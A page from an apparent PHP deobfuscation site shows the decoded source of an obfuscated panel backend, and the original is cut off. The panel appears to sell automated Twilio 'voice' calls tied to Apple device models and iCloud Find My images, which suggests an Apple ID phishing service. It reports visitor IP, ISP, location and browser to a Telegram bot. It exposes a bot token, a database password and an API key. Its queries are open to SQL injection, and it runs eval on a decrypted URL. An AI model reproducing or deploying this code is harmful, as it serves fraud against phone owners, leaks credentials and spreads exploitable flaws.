Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? goto Fxn0Z; EgKf_: function GetLoc($IP) { $ch = curl_init(); curl_setopt($ch, CURLOPT..

Decoded Output download

<?   goto Fxn0Z; EgKf_: function GetLoc($IP) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://ip-api.com/json/" . $IP); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $ip_data_in = curl_exec($ch); curl_close($ch); return $ip_data_in; } goto U01_L; AINam: function Decrypt($string) { $code = base64_decode($string); $code = str_replace("1Kstc", "u", $code); $code = str_replace("23Zc", "o", $code); $code = str_replace("Bka65", "i", $code); $code = str_replace("jbB32", "e", $code); $code = str_replace("Khbfs", "a", $code); $code = str_replace("Tlr15", "=", $code); return base64_decode($code); } goto WDvBl; a3TKI: $requestBody = file_get_contents("php://input"); goto e6WEq; M4a2j: function Report($message) { $ip = $_SERVER["REMOTE_ADDR"]; $arr = GetLoc($ip); $details = json_decode($arr); $send = "\360\x9f\232\x80 \xf0\x9d\x99\236\360\235\x99\240\xf0\x9d\231\235\360\235\x99\x9a\360\235\x99\xa3 \xf0\237\x9a\x80 
"; $send .= "\357\xb8\217=========================<br>"; $send .= $message . " 
"; $send .= "\360\x9f\x93\xa1 IP: {$ip}<br><br>"; $send .= "\xf0\237\223\266 ISP: {$details->isp}<br><br>"; $send .= "\360\x9f\x8c\x8f Address: {$details->city} {$details->country}<br><br>"; $send .= "\360\237\226\245 Browser: {$_SERVER["HTTP_USER_AGENT"]}<br><br>"; $send .= "\xf0\x9f\225\224 Date: " . CurrentDate(); $message1 = str_replace("<br>", "\xa", $send); $send = urlencode($message1); $chat_id = file_get_contents("ikhen/iverifyid.txt"); $api = "5284911251:AAFwktQkiEl8BUrceB_Z8CDRHJXaYINuw0g"; $me = str_split($send, 4096); foreach ($me as $each) { makeApiRequest("https://api.telegram.org/bot{$api}/sendMessage?chat_id={$chat_id}&text={$each}&parse_mode=html"); } } goto EgKf_; tl1Fz: if (isset($_POST) && is_array($ARRAY)) { $_POST = array_merge($_POST, $ARRAY); } goto uLq_L; Fxn0Z: session_start(); goto a3TKI; BNItA: function makeApiRequest($url, $data = null, $headers = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); if ($data != null) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } if ($headers != null) { if (is_string($headers)) { $headers = json_decode($headers, true); } curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return array("Status" => $http_code, "Response" => $response); } goto bJlHv; B0ouV: if ($link === false) { die("ERROR: Could not connect. " . mysqli_connect_error()); } goto iq6kd; U01_L: function CurrentDate() { date_default_timezone_set("Asia/Manila"); return date("F d Y g:i:s A"); } goto xzws7; CFlGV: function generateImg($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); if ($response !== false) { $contentType = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); curl_close($ch); $imageType = ''; if (strpos($contentType, "image/jpeg") !== false) { $imageType = "jpeg"; } elseif (strpos($contentType, "image/png") !== false) { $imageType = "png"; } elseif (strpos($contentType, "image/gif") !== false) { $imageType = "gif"; } if ($imageType !== '') { $base64Image = base64_encode($response); $imgTag = "<img id='' class='' style='' src='data:image/{$imageType};base64,{$base64Image}' alt='Invalid Color'>"; return $imgTag; } else { return "No color found."; } } else { curl_close($ch); return "Error fetching the image."; } } goto TC0bl; xkIsG: define("DB_NAME", "khenserver_wagmodelete"); goto In0Ps; kb9FI: if ($debugging) { ini_set("log_errors", TRUE); ini_set("error_log", "your/path/to/errors.log"); ini_set("display_errors", TRUE); error_reporting(E_ALL); ini_set("ignore_repeated_errors", TRUE); } goto B0ouV; xzws7: function CurrentTime() { date_default_timezone_set("Asia/Manila"); return date("g:i:s A"); } goto BNItA; GyBK6: $connect = $link; goto vwRNq; qxfx8: define("DB_PASSWORD", "Hamza1124!"); goto xkIsG; iq6kd: if (!isset($_POST["updatedata"])) { ExpiredSession(900); } goto E4NYM; bJlHv: function GetNumber($dbname, $dbrow, $name, $search = false) { $connect = $GLOBALS["link"]; $fetch = ''; if (!$search) { $query = mysqli_query($connect, "SELECT * FROM `{$dbname}` WHERE `{$dbrow}` = '{$name}'"); $fetch = mysqli_num_rows($query); } else { $query = mysqli_query($connect, "SELECT * FROM `{$dbname}`"); $fetch = mysqli_num_rows($query); } return $fetch; } goto eSwyg; eSwyg: function GetValue($dbname, $dbrow, $name, $search = false) { $connect = $GLOBALS["link"]; $fetch = ''; if (!$search) { $query = mysqli_query($connect, "SELECT * FROM `{$dbname}` WHERE `{$dbrow}` = '{$name}'"); if (mysqli_num_rows($query) == 0) { return false; } $fetch = mysqli_fetch_array($query); } else { $query = mysqli_query($connect, "SELECT * FROM `{$dbname}`"); $fetch = mysqli_fetch_array($query); } return $fetch; } goto q_UFE; pil76: if (isset($_GET["status"])) { $stat = $_GET["status"]; if ($stat == "on") { mysqli_query($link, "UPDATE `server-status` SET `status`='ON' WHERE `id` = '1'"); echo "Maintenance ON"; die; } else { if ($stat == "off") { mysqli_query($link, "UPDATE `server-status` SET `status`='OFF' WHERE `id` = '1'"); echo "Maintenance OFF"; die; } } } goto zPnXO; TC0bl: function WEBREQUEST($url, $POST = '') { $c = curl_init(); curl_setopt($c, CURLOPT_URL, $url); if ($POST != '') { curl_setopt($c, CURLOPT_POST, 1); curl_setopt($c, CURLOPT_POSTFIELDS, $POST); } curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $results = curl_exec($c); $httpcode = curl_getinfo($c, CURLINFO_HTTP_CODE); curl_close($c); if ($httpcode == "200") { return $results; } else { return "Error: {$httpcode}"; } } goto F40Vt; lvTfg: error_reporting(0); goto IuSEz; F40Vt: function shorten($len) { $str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"; $shuffled = str_shuffle($str); $max = 62 - $len; $shuf = substr($shuffled, $max); $query = mysqli_query($GLOBALS["connect"], "SELECT * FROM `orders` WHERE `short` LIKE '%{$shuf}%'"); while ($fetch = mysqli_fetch_array($query)) { $short = str_replace("https://", '', $fetch["short"]); $exist = explode("/", $short); $shuf = substr($shuffled, $max); if ($shuf != $exist[1]) { break; } } return $shuf; } goto lnhNk; TXkzZ: function Encrypt($string) { $code = base64_encode($string); $code = str_replace("=", "Tlr15", $code); $code = str_replace("a", "Khbfs", $code); $code = str_replace("e", "jbB32", $code); $code = str_replace("i", "Bka65", $code); $code = str_replace("o", "23Zc", $code); $code = str_replace("u", "1Kstc", $code); return base64_encode($code); } goto AINam; n8vHs: define("DB_USERNAME", "khenserver_wagmodelete"); goto qxfx8; gtJyk: $info = mysqli_fetch_array($q); goto LUQ4J; zA3YE: $InfoAlert = array(); goto kb9FI; UCWZ1: $GoodAlert = array(); goto zA3YE; lnhNk: function voicerequest($POST) { $url = ''; include "api.php"; eval("$url = Decrypt("" . $apidomain . "");"); $ch = curl_init($url); curl_setopt($ch, CURLOPT_POSTFIELDS, $POST); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60); curl_setopt($ch, CURLOPT_TIMEOUT, 60); $myResult = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpcode != 200) { return "balik: " . $httpcode; } return $myResult; } goto TXkzZ; wALuj: $link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME); goto GyBK6; In0Ps: $googleAPI = "AIzaSyD94HMXRPmq1TE8LNo6eYUMRTEDdEtHKCQ"; goto wALuj; LUQ4J: $maintenance = $info["status"]; goto arhmj; e6WEq: $ARRAY = json_decode($requestBody, true); goto tl1Fz; q_UFE: function GetCountCompare($dbname, $dbrow, $name, $dbrow1, $search) { $connect = $GLOBALS["link"]; $fetch = ''; $query = mysqli_query($connect, "SELECT * FROM `{$dbname}` WHERE `{$dbrow}` = '{$name}' AND `{$dbrow1}` = '{$search}'"); $num = mysqli_num_rows($query); if ($num <= 0) { return false; } return $num; } goto CFlGV; AI1oc: function ExpiredSession($time) { $link = $GLOBALS["link"]; if (session_status() === PHP_SESSION_NONE) { session_start(); } if (!isset($_SESSION["username"])) { $add = ''; $page = array("{$add}/", "{$add}/index.php", "{$add}/signup.php", "{$add}/forgot.php", "{$add}/mainte.php", "{$add}/changepass.php"); if (!in_array($_SERVER["REQUEST_URI"], $page)) { session_destroy(); header("Location: ../logout.php"); return; } return; } else { if (isset($_SESSION["username"])) { $query = mysqli_query($link, "SELECT * FROM `users`WHERE `username` = '{$_SESSION["username"]}' "); $fetch = mysqli_fetch_array($query); if ($fetch) { $_SESSION["plan"] = $fetch["roles"]; $_SESSION["domainrole"] = $fetch["domain"]; $_SESSION["balance"] = $fetch["balance"]; } else { session_destroy(); header("Location: ../logout.php"); return; } } else { if (time() - $_SESSION["timer"] > $time) { session_destroy(); header("Location: ../logout.php"); return; } else { $_SESSION["timer"] = time(); } } } } goto M4a2j; E4NYM: $q = mysqli_query($link, "SELECT * FROM `server-status` WHERE `id` = '1'"); goto gtJyk; arhmj: if ($maintenance == "ON") { if (isset($_SESSION["admin"])) { if ($_SESSION["admin"] != "admin") { header("location: https://{$_SERVER["SERVER_NAME"]}/mainte.php"); die; } } } else { if ($info["status"] == "OFF" && isset($_SESSION["loggedin"])) { } } goto pil76; zPnXO: if (isset($_SESSION["username"])) { if (isset($_POST["Data"])) { switch ($_POST["Data"]) { case "ChangeColor": $model = $_POST["Model"]; $brand = "Watch"; if (strpos($model, "iPhone") !== false) { $brand = "iPhone"; } elseif (strpos($model, "iPad") !== false) { $brand = "iPad"; } else { $brand = "Watch"; } $screen = $_POST["Screen"]; $back = $_POST["Back"]; $url = "https://statici.icloud.com/fmipmobile/deviceImages-9.0/{$brand}/{$model}-{$screen}-{$back}-0/online-infobox__3x.png"; if ($screen == "default") { $url = "https://statici.icloud.com/fmipmobile/deviceImages-9.0/{$brand}/{$model}/online-infobox__3x.png"; } $img = generateImg($url); die(json_encode(array("Image" => $img))); break; case "GetAddress": $Address = $_POST["Address"]; $response = WEBREQUEST("https://maps.googleapis.com/maps/api/geocode/json?address=" . rawurlencode($Address) . "&key={$GLOBALS["googleAPI"]}"); $json = json_decode($response); $results = $json->results; $lat = ''; $lng = ''; $status = $json->status; if (count($results) > 0) { $lat = $json->results[0]->geometry->location->lat; $lng = $json->results[0]->geometry->location->lng; } $msg = $status != "OK" ? "alert('Address incorrect! Please try again.')" : "alert('Address verified!')"; die(json_encode(array("Response" => $msg, "Location" => "{$lat}|{$lng}"))); break; default: break; } } else { if (isset($_POST["ORDERVOICE"])) { $ORDERVOICE = $_POST["ORDERVOICE"]; $NUMBER = $_POST["NUMBER"]; $MODEL = $_POST["MODEL"]; $VOICE = $_POST["VOICE"]; $NOTE = $_POST["NOTE"]; $SERVICE = $_POST["SERVICE"]; $SERVER = $_POST["SERVER"]; $username = $_SESSION["username"]; $DATE = CurrentDate(); $query2 = mysqli_query($connect, "SELECT * FROM `twilio` WHERE `name` = '{$SERVER}'"); $fetch2 = mysqli_fetch_array($query2); $POST["token"] = Encrypt($fetch2["token"]); $POST["sid"] = Encrypt($fetch2["sid"]); $POST["ownernum"] = Encrypt($fetch2["number"]); $POST["run"] = Encrypt("ordervoice"); $POST["REPORT"] = $_SERVER["HTTP_HOST"]; $POST["NUMBER"] = $NUMBER; $POST["MODEL"] = $MODEL; $POST["VOICE"] = $VOICE; $POST["SERVICE"] = $SERVICE; $POST["DATE"] = $DATE; $query = mysqli_query($connect, "SELECT * FROM `users` WHERE `username` = '{$_SESSION["username"]}'"); $fetch = mysqli_fetch_array($query); $query1 = mysqli_query($connect, "SELECT * FROM `service` WHERE `name` = 'voice'"); $fetch1 = mysqli_fetch_array($query1); $amount = $fetch1["amount"]; $credit = $fetch["balance"]; if ($amount > $credit) { die("Toastr('Credits not enough!\xa 
Amount: {$amount}\xa\xaCredits Left: {$credit}','','warning');"); } else { if ($credit >= $amount) { $device = mysqli_fetch_array(mysqli_query($connect, "SELECT * FROM `devicess` WHERE `name` = '{$MODEL}'")); $DEVICE = $device["models"]; mysqli_query($link, "INSERT INTO `voice-history` (`server`, `username`, `service`, `model`, `voice`, `number`, `note`, `date`) VALUES('{$SERVER}','{$username}','{$SERVICE}','{$DEVICE}','{$VOICE}','{$NUMBER}','{$NOTE}','{$DATE}')"); $check = voicerequest($POST); try { if (str_contains($check, "balik")) { $re = str_replace("balik: ", '', $check); $reply = "Unauthorized account! error {$re}"; die("Toastr('{$reply}','','warning');"); } $a = json_decode($check, true); $result = $a["Result"]; if ($result == "Error") { die("Toastr('Phone carrier cannot verify. Make sure you enter correct number.<br>#{$a["Reason"]}','','error')"); } if ($result == "ApiError") { $reason = $a["Reason"]; if (strpos($reason, "[HTTP 401]") !== false) { $message = "\xe2\x9a\240 WRONG API ACCOUNT! \342\232\240\xa\xa"; $message .= "\xf0\x9f\221\256\xf0\x9f\217\xbe Position: {$fetch["position"]}\xa 
"; $message .= "\xf0\237\x91\250\xe2\x80\215\xf0\237\222\xbb Username: {$username} 
\xa"; $message .= "\360\237\x94\x97 Domain: {$domain} 
 
"; $message .= "\360\x9f\223\241 IP: {$ip}\xa\xa"; $message .= "\360\x9f\x96\xa5 Browser: {$user_agent}\xa 
"; $message .= "SID: {$fetch2["sid"]}\xa 
"; $message .= "API Response: {$reason}\xa\xa"; $message .= "\xf0\x9f\222\xa5 Admin: @khenserver \360\x9f\x92\xa5"; BotMessage($message); $reply = "Invalid API Account! Please contact administrator."; die("Toastr('Invalid API Account! Please contact administrator.','','info')"); } else { if (strpos($reason, "[HTTP 404]") !== false) { die("Toastr('Phone carrier cannot verify. Make sure you enter correct number.<br>INCORRECT NUMBER.','','error')"); } else { $return = str_replace("Twilio", "{$TELE_USERNAME}", $reason); $return = str_replace("'", """, $return); die("Toastr('API Account has problem! Please contact administrator.<br> Error: {$return}','','warning')"); } } return; } else { if ($result == "Success") { $query = mysqli_query($connect, "SELECT * FROM `users` WHERE `username` = '{$_SESSION["username"]}'"); $fetch = mysqli_fetch_array($query); $query1 = mysqli_query($connect, "SELECT * FROM `service` WHERE `name` = 'voice'"); $fetch1 = mysqli_fetch_array($query1); $amount = $fetch1["amount"]; $credit = $fetch["balance"]; if ($credit >= $amount) { $sid = $a["Sid"]; $newbal = $credit - $amount; mysqli_query($connect, "UPDATE `users` SET `balance` = '{$newbal}' WHERE `username` = '{$_SESSION["username"]}'"); $query = mysqli_query($connect, "UPDATE `voice-history` SET `csid`='{$sid}' WHERE `date` = '{$DATE}'"); die("Toastr('Call {$a["Carrier"]} Order success! Your order status can be check in Order History','','success')"); } } } } catch (Exception $e) { $message = "\342\x9a\240 API ERROR SERVER! \xe2\232\xa0\xa\xa"; $message .= "API Response: {$check} 
\xa"; $message .= "\360\237\x92\xa5 Admin: @khenserver \xf0\x9f\222\xa5"; BotMessage($message); $reply = "Invalid API Response! Please contact administrator."; die("Toastr('Invalid API Response! Please contact administrator.','','error')"); } return; } } die("Success"); } else { if (isset($_POST["REDIAL"])) { $json = explode(":", $_POST["REDIAL"]); $NUMBER = $json[0]; $DATE = str_replace("DATE=", '', urldecode($json[1])); $username = $_SESSION["username"]; $query = mysqli_query($connect, "SELECT * FROM `users` WHERE `username` = '{$username}'"); $fetch = mysqli_fetch_array($query); $query1 = mysqli_query($connect, "SELECT * FROM `service` WHERE `name` = 'voice'"); $fetch1 = mysqli_fetch_array($query1); $credit = $fetch["balance"]; $amount = $fetch1["amount"]; if ($amount > $credit) { die("Toastr('Credits not enough! 
 
Amount: {$amount} 
\xaCredits Left: {$credit}','','warning');"); } else { if ($credit >= $amount) { $infos = mysqli_fetch_array(mysqli_query($connect, "SELECT * FROM `voice-history` WHERE `date` = '{$DATE}'")); $device = mysqli_fetch_array(mysqli_query($connect, "SELECT * FROM `devicess` WHERE `models` = '{$infos["model"]}'")); $MODEL = $device["name"]; $VOICE = $infos["voice"]; $SERVICE = $infos["service"]; $SERVER = $infos["server"]; $query2 = mysqli_query($connect, "SELECT * FROM `twilio` WHERE `name` = '{$SERVER}'"); $fetch2 = mysqli_fetch_array($query2); $POST["token"] = Encrypt($fetch2["token"]); $POST["sid"] = Encrypt($fetch2["sid"]); $POST["ownernum"] = Encrypt($fetch2["number"]); $POST["run"] = Encrypt("ordervoice"); $POST["NUMBER"] = $NUMBER; $POST["MODEL"] = $MODEL; $POST["VOICE"] = $VOICE; $POST["SERVICE"] = $SERVICE; $POST["DATE"] = $DATE; $POST["REPORT"] = $_SERVER["HTTP_HOST"]; $query = mysqli_query($connect, "SELECT * FROM `users` WHERE `username` = '{$_SESSION["username"]}'"); $fetch = mysqli_fetch_array($query); $query1 = mysqli_query($connect, "SELECT * FROM `service` WHERE `name` = 'voice'"); $fetch1 = mysqli_fetch_array($query1); $amount = $fetch1["amount"]; $credit = $fetch["balance"]; try { $check = voicerequest($POST); if (str_contains($check, "balik")) { $re = str_replace("balik: ", '', $check); $reply = "Unauthorized account! error {$re}"; return $reply; } $a = json_decode($check, true); $result = $a["Result"]; if ($result == "Error") { die("Toastr('Phone carrier cannot verify. Make sure you enter correct number.<br>#{$a["Reason"]}','','error');"); } if ($result == "ApiError") { $reason = $a["Reason"]; if (strpos($reason, "[HTTP 401]") !== false) { $message = "\xe2\232\xa0 WRONG API ACCOUNT! \xe2\232\xa0\xa\xa"; $message .= "\xf0\x9f\x91\256\xf0\x9f\217\xbe Position: {$fetch["position"]}\xa 
"; $message .= "\xf0\237\x91\250\xe2\200\x8d\xf0\237\x92\273 Username: {$username}\xa\xa"; $message .= "\360\x9f\224\227 Domain: {$domain}\xa\xa"; $message .= "\xf0\x9f\223\241 IP: {$ip}\xa 
"; $message .= "\360\237\226\xa5 Browser: {$user_agent} 
\xa"; $message .= "SID: {$fetch2["sid"]}\xa 
"; $message .= "API Response: {$reason} 
 
"; $message .= "\360\237\x92\xa5 Admin: @khenserver \xf0\x9f\222\xa5"; BotMessage($message); $reply .= "Invalid API Account! Please contact administrator."; die("Toastr('Invalid API Account! Please contact administrator.','','error');"); } else { if (strpos($reason, "[HTTP 404]") !== false) { $reply .= "Phone carrier cannot verify. Make sure you enter correct number.<br>INCORRECT NUMBER."; die("Toastr('Phone carrier cannot verify. Make sure you enter correct number.<br>INCORRECT NUMBER.','','error');"); } else { $return = str_replace("Twilio", "{$TELE_USERNAME}", $reason); $return .= str_replace("'", """, $return); $reply .= "API Account has problem! Please contact administrator.<br> Error: {$return}"; die("Toastr('API Account has problem! Please contact administrator.<br> Error: {$return}','','error');"); } } } else { if ($result == "Success") { $query = mysqli_query($connect, "SELECT * FROM `users` WHERE `username` = '{$_SESSION["username"]}'"); $fetch = mysqli_fetch_array($query); $query1 = mysqli_query($connect, "SELECT * FROM `service` WHERE `name` = 'voice'"); $fetch1 = mysqli_fetch_array($query1); $amount = $fetch1["amount"]; $credit = $fetch["balance"]; if ($credit >= $amount) { $sid = $a["Sid"]; $newbal = $credit - $amount; mysqli_query($connect, "UPDATE `users` SET `balance` = '{$newbal}' WHERE `username` = '{$_SESSION["username"]}'"); $query = mysqli_query($connect, "UPDATE `voice-history` SET `csid`='{$sid}' WHERE `date` = '{$DATE}'"); $reply = "Redial {$a["Carrier"]} Order success! Your order status can be check in Order History"; die("Toastr('Redial {$a["Carrier"]} Order success! Your order status can be check in Order History','','success');"); return $reply; } } } } catch (Exception $e) { $message = "\342\232\240 API ERROR SERVER! \342\x9a\240 
\xa"; $message .= "API Response: {$check}\xa\xa"; $message .= "\xf0\237\222\245 Admin: @khenserver \360\x9f\222\xa5"; BotMessage($message); $reply = "Invalid API Response! Please contact administrator."; die("Toastr('{$reply}','','error');"); } return; } } return; } } } } goto AI1oc; IuSEz: $ErrorAlert = array(); goto UCWZ1; vwRNq: $debugging = false; goto lvTfg; WDvBl: function BotMessage($message) { if (!LOCAL) { $currentdate = CurrentDate(); file_put_contents("Error({$currentdate})", $message); } } goto K3PpL; uLq_L: define("DB_SERVER", "localhost"); goto n8vHs; K3PpL:  ?>

Did this file decode correctly?

Original Code

<?   goto Fxn0Z; EgKf_: function GetLoc($IP) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://ip-api.com/json/" . $IP); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $ip_data_in = curl_exec($ch); curl_close($ch); return $ip_data_in; } goto U01_L; AINam: function Decrypt($string) { $code = base64_decode($string); $code = str_replace("1Kstc", "u", $code); $code = str_replace("23Zc", "o", $code); $code = str_replace("Bka65", "i", $code); $code = str_replace("jbB32", "e", $code); $code = str_replace("Khbfs", "a", $code); $code = str_replace("Tlr15", "=", $code); return base64_decode($code); } goto WDvBl; a3TKI: $requestBody = file_get_contents("php://input"); goto e6WEq; M4a2j: function Report($message) { $ip = $_SERVER["REMOTE_ADDR"]; $arr = GetLoc($ip); $details = json_decode($arr); $send = "\360\x9f\232\x80 \xf0\x9d\x99\236\360\235\x99\240\xf0\x9d\231\235\360\235\x99\x9a\360\235\x99\xa3 \xf0\237\x9a\x80
"; $send .= "\357\xb8\217=========================<br>"; $send .= $message . "
"; $send .= "\360\x9f\x93\xa1 IP: {$ip}<br><br>"; $send .= "\xf0\237\223\266 ISP: {$details->isp}<br><br>"; $send .= "\360\x9f\x8c\x8f Address: {$details->city} {$details->country}<br><br>"; $send .= "\360\237\226\245 Browser: {$_SERVER["HTTP_USER_AGENT"]}<br><br>"; $send .= "\xf0\x9f\225\224 Date: " . CurrentDate(); $message1 = str_replace("<br>", "\xa", $send); $send = urlencode($message1); $chat_id = file_get_contents("ikhen/iverifyid.txt"); $api = "5284911251:AAFwktQkiEl8BUrceB_Z8CDRHJXaYINuw0g"; $me = str_split($send, 4096); foreach ($me as $each) { makeApiRequest("https://api.telegram.org/bot{$api}/sendMessage?chat_id={$chat_id}&text={$each}&parse_mode=html"); } } goto EgKf_; tl1Fz: if (isset($_POST) && is_array($ARRAY)) { $_POST = array_merge($_POST, $ARRAY); } goto uLq_L; Fxn0Z: session_start(); goto a3TKI; BNItA: function makeApiRequest($url, $data = null, $headers = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); if ($data != null) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } if ($headers != null) { if (is_string($headers)) { $headers = json_decode($headers, true); } curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return array("Status" => $http_code, "Response" => $response); } goto bJlHv; B0ouV: if ($link === false) { die("ERROR: Could not connect. " . mysqli_connect_error()); } goto iq6kd; U01_L: function CurrentDate() { date_default_timezone_set("Asia/Manila"); return date("F d Y g:i:s A"); } goto xzws7; CFlGV: function generateImg($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); if ($response !== false) { $contentType = curl_getinfo($ch, CURLINFO_CONTENT_TYPE); curl_close($ch); $imageType = ''; if (strpos($contentType, "image/jpeg") !== false) { $imageType = "jpeg"; } elseif (strpos($contentType, "image/png") !== false) { $imageType = "png"; } elseif (strpos($contentType, "image/gif") !== false) { $imageType = "gif"; } if ($imageType !== '') { $base64Image = base64_encode($response); $imgTag = "<img id='' class='' style='' src='data:image/{$imageType};base64,{$base64Image}' alt='Invalid Color'>"; return $imgTag; } else { return "No color found."; } } else { curl_close($ch); return "Error fetching the image."; } } goto TC0bl; xkIsG: define("DB_NAME", "khenserver_wagmodelete"); goto In0Ps; kb9FI: if ($debugging) { ini_set("log_errors", TRUE); ini_set("error_log", "your/path/to/errors.log"); ini_set("display_errors", TRUE); error_reporting(E_ALL); ini_set("ignore_repeated_errors", TRUE); } goto B0ouV; xzws7: function CurrentTime() { date_default_timezone_set("Asia/Manila"); return date("g:i:s A"); } goto BNItA; GyBK6: $connect = $link; goto vwRNq; qxfx8: define("DB_PASSWORD", "Hamza1124!"); goto xkIsG; iq6kd: if (!isset($_POST["updatedata"])) { ExpiredSession(900); } goto E4NYM; bJlHv: function GetNumber($dbname, $dbrow, $name, $search = false) { $connect = $GLOBALS["link"]; $fetch = ''; if (!$search) { $query = mysqli_query($connect, "SELECT * FROM `{$dbname}` WHERE `{$dbrow}` = '{$name}'"); $fetch = mysqli_num_rows($query); } else { $query = mysqli_query($connect, "SELECT * FROM `{$dbname}`"); $fetch = mysqli_num_rows($query); } return $fetch; } goto eSwyg; eSwyg: function GetValue($dbname, $dbrow, $name, $search = false) { $connect = $GLOBALS["link"]; $fetch = ''; if (!$search) { $query = mysqli_query($connect, "SELECT * FROM `{$dbname}` WHERE `{$dbrow}` = '{$name}'"); if (mysqli_num_rows($query) == 0) { return false; } $fetch = mysqli_fetch_array($query); } else { $query = mysqli_query($connect, "SELECT * FROM `{$dbname}`"); $fetch = mysqli_fetch_array($query); } return $fetch; } goto q_UFE; pil76: if (isset($_GET["status"])) { $stat = $_GET["status"]; if ($stat == "on") { mysqli_query($link, "UPDATE `server-status` SET `status`='ON' WHERE `id` = '1'"); echo "Maintenance ON"; die; } else { if ($stat == "off") { mysqli_query($link, "UPDATE `server-status` SET `status`='OFF' WHERE `id` = '1'"); echo "Maintenance OFF"; die; } } } goto zPnXO; TC0bl: function WEBREQUEST($url, $POST = '') { $c = curl_init(); curl_setopt($c, CURLOPT_URL, $url); if ($POST != '') { curl_setopt($c, CURLOPT_POST, 1); curl_setopt($c, CURLOPT_POSTFIELDS, $POST); } curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $results = curl_exec($c); $httpcode = curl_getinfo($c, CURLINFO_HTTP_CODE); curl_close($c); if ($httpcode == "200") { return $results; } else { return "Error: {$httpcode}"; } } goto F40Vt; lvTfg: error_reporting(0); goto IuSEz; F40Vt: function shorten($len) { $str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"; $shuffled = str_shuffle($str); $max = 62 - $len; $shuf = substr($shuffled, $max); $query = mysqli_query($GLOBALS["connect"], "SELECT * FROM `orders` WHERE `short` LIKE '%{$shuf}%'"); while ($fetch = mysqli_fetch_array($query)) { $short = str_replace("https://", '', $fetch["short"]); $exist = explode("/", $short); $shuf = substr($shuffled, $max); if ($shuf != $exist[1]) { break; } } return $shuf; } goto lnhNk; TXkzZ: function Encrypt($string) { $code = base64_encode($string); $code = str_replace("=", "Tlr15", $code); $code = str_replace("a", "Khbfs", $code); $code = str_replace("e", "jbB32", $code); $code = str_replace("i", "Bka65", $code); $code = str_replace("o", "23Zc", $code); $code = str_replace("u", "1Kstc", $code); return base64_encode($code); } goto AINam; n8vHs: define("DB_USERNAME", "khenserver_wagmodelete"); goto qxfx8; gtJyk: $info = mysqli_fetch_array($q); goto LUQ4J; zA3YE: $InfoAlert = array(); goto kb9FI; UCWZ1: $GoodAlert = array(); goto zA3YE; lnhNk: function voicerequest($POST) { $url = ''; include "api.php"; eval("$url = Decrypt("" . $apidomain . "");"); $ch = curl_init($url); curl_setopt($ch, CURLOPT_POSTFIELDS, $POST); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60); curl_setopt($ch, CURLOPT_TIMEOUT, 60); $myResult = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpcode != 200) { return "balik: " . $httpcode; } return $myResult; } goto TXkzZ; wALuj: $link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME); goto GyBK6; In0Ps: $googleAPI = "AIzaSyD94HMXRPmq1TE8LNo6eYUMRTEDdEtHKCQ"; goto wALuj; LUQ4J: $maintenance = $info["status"]; goto arhmj; e6WEq: $ARRAY = json_decode($requestBody, true); goto tl1Fz; q_UFE: function GetCountCompare($dbname, $dbrow, $name, $dbrow1, $search) { $connect = $GLOBALS["link"]; $fetch = ''; $query = mysqli_query($connect, "SELECT * FROM `{$dbname}` WHERE `{$dbrow}` = '{$name}' AND `{$dbrow1}` = '{$search}'"); $num = mysqli_num_rows($query); if ($num <= 0) { return false; } return $num; } goto CFlGV; AI1oc: function ExpiredSession($time) { $link = $GLOBALS["link"]; if (session_status() === PHP_SESSION_NONE) { session_start(); } if (!isset($_SESSION["username"])) { $add = ''; $page = array("{$add}/", "{$add}/index.php", "{$add}/signup.php", "{$add}/forgot.php", "{$add}/mainte.php", "{$add}/changepass.php"); if (!in_array($_SERVER["REQUEST_URI"], $page)) { session_destroy(); header("Location: ../logout.php"); return; } return; } else { if (isset($_SESSION["username"])) { $query = mysqli_query($link, "SELECT * FROM `users`WHERE `username` = '{$_SESSION["username"]}' "); $fetch = mysqli_fetch_array($query); if ($fetch) { $_SESSION["plan"] = $fetch["roles"]; $_SESSION["domainrole"] = $fetch["domain"]; $_SESSION["balance"] = $fetch["balance"]; } else { session_destroy(); header("Location: ../logout.php"); return; } } else { if (time() - $_SESSION["timer"] > $time) { session_destroy(); header("Location: ../logout.php"); return; } else { $_SESSION["timer"] = time(); } } } } goto M4a2j; E4NYM: $q = mysqli_query($link, "SELECT * FROM `server-status` WHERE `id` = '1'"); goto gtJyk; arhmj: if ($maintenance == "ON") { 